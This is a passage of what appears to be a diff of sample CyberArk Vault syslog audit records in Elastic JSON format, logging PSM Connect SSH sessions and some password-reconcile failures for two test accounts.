<ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:00</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:31</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:31Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:06</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:06Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:28</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:28Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
-<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:09</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
-<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 03:04:51</Timestamp>\n    <IsoTimestamp>2021-03-16T10:04:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:20</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:34</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:34Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty 